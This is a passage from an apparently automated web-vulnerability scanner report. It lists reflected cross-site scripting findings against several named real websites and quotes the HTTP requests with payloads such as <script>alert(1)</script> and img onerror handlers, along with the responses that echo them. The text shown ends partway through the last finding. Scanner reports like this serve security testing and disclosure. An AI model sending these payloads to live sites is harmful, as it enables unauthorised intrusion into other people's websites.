This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico800fa<script>alert(1)</script>f2eb3a906fd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 03:14:34 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1403
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico800fa<script>alert(1)</script>f2eb3a906fd not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
   fo
...[SNIP]...
<h1>/favicon.ico800fa<script>alert(1)</script>f2eb3a906fd not found on elyricsworld.com</h1>
...[SNIP]...

1.47. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 33f72</title><script>alert(1)</script>7bc3345a70f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico33f72</title><script>alert(1)</script>7bc3345a70f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 03:14:34 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1419
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico33f72</title><script>alert(1)</script>7bc3345a70f not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{
...[SNIP]...

1.48. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 3fe68</title><script>alert(1)</script>a78f99571dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?3fe68</title><script>alert(1)</script>a78f99571dc=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 03:14:34 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1425
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico?3fe68</title><script>alert(1)</script>a78f99571dc=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body

...[SNIP]...

1.49. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.elyricsworld.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 14dd9<script>alert(1)</script>3e7d9a90ad9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?14dd9<script>alert(1)</script>3e7d9a90ad9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.elyricsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 03:14:33 GMT
Server: Apache/2.2.17 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 1409
Content-Type: text/html

<html>
   <head>
       <title>/favicon.ico?14dd9<script>alert(1)</script>3e7d9a90ad9=1 not found on elyricsworld.com</title>
       <meta name="robots" content="noindex">
<style type="text/css">
body
{

...[SNIP]...
<h1>/favicon.ico?14dd9<script>alert(1)</script>3e7d9a90ad9=1 not found on elyricsworld.com</h1>
...[SNIP]...

1.50. http://www.everydayhealth.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.everydayhealth.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c96'%3b233a586cfa8 was submitted in the REST URL parameter 1. This input was echoed as 55c96';233a586cfa8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico55c96'%3b233a586cfa8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.everydayhealth.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 File Not Found
Date: Thu, 31 Mar 2011 20:11:24 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcwmcaXZKpkxODljZDBmYS0wNTViLTQ1YzQtYWU1Yy05ZTcxM2I4ZjlkNzU1; expires=Thu, 09-Jun-2011 06:51:24 GMT; path=/
Set-Cookie: ASP.NET_SessionId=rm4vfcqc0rkmcr45hnhmknjc; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16300


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<script> COMSCORE.beacon({ c1: 2, c2: '6035818', c3: '', c4: 'www.everydayhealth.com/favicon.ico55c96';233a586cfa8', c5: '', c6: '', c15: ''});</script>
...[SNIP]...

1.51. http://www.favecrafts.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.favecrafts.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4ee9"><script>alert(1)</script>2114a57d217 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa4ee9"><script>alert(1)</script>2114a57d217 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.favecrafts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 21:58:50 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=f43c92c1cd1be631c4edde5942cdaf3d; expires=Thu, 07-Apr-2011 21:58:50 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 87432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

   
   <meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<a href="" class="lastLink" onclick="return bookmark('http://www.favecrafts.com/favicon.icoa4ee9"><script>alert(1)</script>2114a57d217','');">
...[SNIP]...

1.52. http://www.foodandwine.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.foodandwine.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da652"%3bbc4ae8cb999 was submitted in the REST URL parameter 1. This input was echoed as da652";bc4ae8cb999 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /da652"%3bbc4ae8cb999 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foodandwine.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 3826
Connection: Keep-Alive
Cache-Control: max-age=7200,public
Content-Type: text/html; charset=utf-8
Date: Thu, 31 Mar 2011 21:10:15 GMT
Server: Apache/2.2.3 (Red Hat)
Status: 404
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11

<html xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'>
<head>
<title>Page Not Found | Food & Wine</title>
<meta content='text/html; charset=iso-8859-1' http-equiv='Content
...[SNIP]...
<script type='text/javascript'>
var s_account = "timefoodandwine";
var search_kw = "";
var channel = "da652";bc4ae8cb999";
var sub_channel = "";
var titleNoBrand = document.title;
titleNoBrand = titleNoBrand.slice(0,titleNoBrand.indexOf(' |'));
function fw_linktracker(linkname)
{
var titleNoChef = document.title;
titleN
...[SNIP]...

1.53. http://www.foreignpolicy.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foreignpolicy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 619b3"><script>alert(1)</script>a747a8ea890 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico619b3"><script>alert(1)</script>a747a8ea890 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foreignpolicy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=600
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301609192"
Last-Modified: Thu, 31 Mar 2011 22:06:32 GMT
X-AH-Environment: prod
Content-Length: 34426
Date: Thu, 31 Mar 2011 22:06:32 GMT
X-Varnish: 1588628761
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<meta property="og:url" content="http://www.foreignpolicy.com/favicon.ico619b3"><script>alert(1)</script>a747a8ea890"/>
...[SNIP]...

1.54. http://www.foreignpolicy.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foreignpolicy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7b92"-alert(1)-"8460d23bac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icoa7b92"-alert(1)-"8460d23bac5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.foreignpolicy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=600
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301609193"
Last-Modified: Thu, 31 Mar 2011 22:06:33 GMT
X-AH-Environment: prod
Content-Length: 34396
Date: Thu, 31 Mar 2011 22:06:34 GMT
X-Varnish: 1588629337
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<!--
s.pageName="fp - /favicon.icoa7b92"-alert(1)-"8460d23bac5";
s.channel="fp - unknown";
s.hier1="www | uncategorized";
s.hier2="foreignpolicy.com | www | uncategorized";
s.prop2="";
s.prop3="article";
s.prop5="";
s.prop12="";
s.prop25="";
s.prop32="drupal";
s.
...[SNIP]...

1.55. http://www.gamespot.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gamespot.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03a8"><script>alert(1)</script>c3c94a296fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc03a8"><script>alert(1)</script>c3c94a296fd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamespot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 31 Mar 2011 20:11:06 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.2.5
Set-Cookie: geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; expires=Sat, 30-Apr-2011 20:11:06 GMT; path=/; domain=.gamespot.com
Set-Cookie: ctk=NGQ5NGRmZGFhZGMxZDZmMzRhZWUwY2E1OWJiMw%3D%3D; expires=Tue, 27-Sep-2011 20:11:06 GMT; path=/; domain=.gamespot.com
Set-Cookie: gspot_side_033111=1; expires=Sun, 03-Apr-2011 20:11:06 GMT; path=/; domain=.gamespot.com
Set-Cookie: hello_from_gs=1; path=/; domain=.gamespot.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://www.gamespot.com/favicon.icoc03a8"><script>alert(1)</script>c3c94a296fd" />
...[SNIP]...

1.56. http://www.gamestop.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gamestop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 458c0'a%3d'b'4d608cb70ba was submitted in the REST URL parameter 1. This input was echoed as 458c0'a='b'4d608cb70ba in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico458c0'a%3d'b'4d608cb70ba HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamestop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Thu, 31 Mar 2011 20:15:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; domain=gamestop.com; expires=Wed, 31-Mar-2021 20:15:18 GMT; path=/
Set-Cookie: CookieState=V=1; path=/
Set-Cookie: LandingUrl=http://www.gamestop.com/badurl.aspx?404;http://www.gamestop.com/common/gui/favicon.ico458c0'a='b'4d608cb70ba; path=/
Set-Cookie: CampaignHistory=; path=/
Set-Cookie: BIGipServerwww.gamestop.com-80=650777772.20480.0000; path=/
Content-Length: 181417


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<script language='jav
...[SNIP]...
<a href='/Profiles/Login.aspx?ReturnUrl=/badurl.aspx?404;http://www.gamestop.com/common/gui/favicon.ico458c0'a='b'4d608cb70ba' id='header_auth_actions' rel='nofollow'>
...[SNIP]...

1.57. http://www.gather.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2534<img%20src%3da%20onerror%3dalert(1)>37bac4424e8 was submitted in the REST URL parameter 1. This input was echoed as d2534<img src=a onerror=alert(1)>37bac4424e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /d2534<img%20src%3da%20onerror%3dalert(1)>37bac4424e8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 20:16:05 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=2E9FDB931F9B6388A0C7CAAC94BB4C2B; Domain=.gather.com; Path=/
Set-Cookie: vis=HdkU8Hbs5hVHjy83U0WCj9VGT69anurplgmT88MsvzJmo10NLnFruY71+tQe++OV1dSVwln4y+rMysAb/tHSXjQkh06aFmEiWWtZ2tFz9WU=; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:16:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=VXl8U+/+uLjaIQOofjluHpYUf7slxcvwMQUvAbTFwVWvH1vlzmhLTQ4JX2/DYNAh/PDi8iZy201gdHx/+MlBWEc6TVjrfEoNDT8iC3OTKHDhp5A2eWAH5qtL+lsfjkIZ; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:16:05 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17544
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<em>d2534<img src=a onerror=alert(1)>37bac4424e8</em>
...[SNIP]...

1.58. http://www.gather.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.gather.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46cf4"><a>f6e771fb85b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /46cf4"><a>f6e771fb85b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gather.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 31 Mar 2011 20:15:47 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=11CBF94ACC4AE7E65E1C4A80E106B29B; Domain=.gather.com; Path=/
Set-Cookie: vis=IQEE2srEKXa7NIKTUcORrOUj7hWAro2sGoX+WTfIfx9z48PQx/dnfCx/jFJ1YkriqWn6kqfjRS9ZYk8SSfkIh/+Cq7DpbNRKce0obUmjiNg=; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:15:47 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Set-Cookie: vis=CbQ2sV5k921W3oerMNOFf5YUf7slxcvw/6LJ3a72UYFqB5zXunhsOH3jBkWIAmPPr2nN88tvgFf57wOJd0hurgUMKy/C08uq57pV6xba8OePrfbi7B6t42HYXo/XC829; Domain=gather.com; Expires=Wed, 26-Mar-2031 20:15:47 GMT; Path=/
P3P: policyref="http://ads.gather.com/w3c/p3p.xml", CP="PSAa PSDa ADMa DEVa OUR IND DSP NOI COR UNI NAV CURa COM INT"
Content-Length: 17459
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">



...[SNIP]...
<meta name="keywordVal" content="46cf4"><a>f6e771fb85b" >
...[SNIP]...

1.59. http://www.geni.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.geni.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da0bd"><script>alert(1)</script>315a16ef299 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoda0bd"><script>alert(1)</script>315a16ef299 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.geni.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Thu, 31 Mar 2011 21:47:07 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404 Not Found
Content-Length: 18182
Cache-Control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.com/2008/fb
...[SNIP]...
<input type="hidden" id="join_return_to" name="return_to" value="/favicon.icoda0bd"><script>alert(1)</script>315a16ef299" />
...[SNIP]...

1.60. http://www.glogster.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.glogster.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe436"-alert(1)-"585424767da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icofe436"-alert(1)-"585424767da HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.glogster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Glogster-60
Set-Cookie: PHPSESSID=4j5e3sph0ea9okh9drhnm55264; path=/; domain=.glogster.com
Set-Cookie: visitor_id=1888590470; expires=Fri, 01-Apr-2011 21:14:54 GMT; path=/; domain=.glogster.com
Set-Cookie: loggedIn=0; expires=Sat, 30-Apr-2011 21:14:54 GMT; path=/; domain=.glogster.com
Set-Cookie: preferredLanguage=en; expires=Sat, 30-Apr-2011 21:14:54 GMT; path=/; domain=.glogster.com
Set-Cookie: country=US; expires=Sat, 30-Apr-2011 21:14:54 GMT; path=/; domain=.glogster.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-control: private
Pragma: max-age=3600
Content-Language: en
Date: Thu, 31 Mar 2011 21:14:54 GMT
Content-Length: 10401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:addthis="http://w
...[SNIP]...
<script type="text/javascript">
GA_googleAddSlot("ca-pub-3124541700945876", "en_favicon.icofe436"-alert(1)-"585424767da_footer_728x90");
</script>
...[SNIP]...

1.61. http://www.good.is/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.good.is
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e5b"><img%20src%3da%20onerror%3dalert(1)>12e6ef332ea was submitted in the REST URL parameter 1. This input was echoed as 96e5b"><img src=a onerror=alert(1)>12e6ef332ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico96e5b"><img%20src%3da%20onerror%3dalert(1)>12e6ef332ea HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.good.is
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx/0.7.65
Vary: Accept-Encoding
Date: Thu, 31 Mar 2011 21:17:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en" lang="en" xm
...[SNIP]...
<body class="LAYOUT-default CONTROLLER-favicon.ico96e5b"><img src=a onerror=alert(1)>12e6ef332ea ACTION-index">
...[SNIP]...

1.62. http://www.gourmandia.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gourmandia.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31abe"><script>alert(1)</script>178f2c2e0b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico31abe"><script>alert(1)</script>178f2c2e0b5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gourmandia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Thu, 31 Mar 2011 20:45:18 GMT
Server: Apache
Set-Cookie: PHPSESSID=rovl677opgbvqrmnu40vtr8h47; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<title>4
...[SNIP]...
<form id="testform" action="/404.php/favicon.ico31abe"><script>alert(1)</script>178f2c2e0b5" method="post">
...[SNIP]...

1.63. http://www.healthline.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.healthline.com
Path:   /favicon.ico

Issue detail

